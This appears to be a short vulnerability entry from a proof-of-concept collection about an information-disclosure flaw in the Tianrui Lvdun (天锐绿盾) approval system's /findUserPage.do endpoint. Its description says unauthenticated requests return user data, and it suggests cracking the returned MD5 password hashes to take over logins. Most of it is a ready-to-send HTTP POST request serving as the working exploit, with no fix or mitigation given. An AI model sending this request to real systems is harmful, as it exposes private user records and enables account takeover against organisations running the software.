天锐绿盾审批系统 findUserPage.do 信息泄露

2025-08-21 天锐绿盾审批系统 PoC Public

Description

天锐绿盾审批系统 /findUserPage.do接口未做合理权限限制,导致未授权执行获取系统隐私数据,可对获取的密码进行md5碰撞后实现系统登录接管。

PoC

POST /trwfe/user/findUserPage.do HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userName=&deptId=0&page=1&rows=10

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities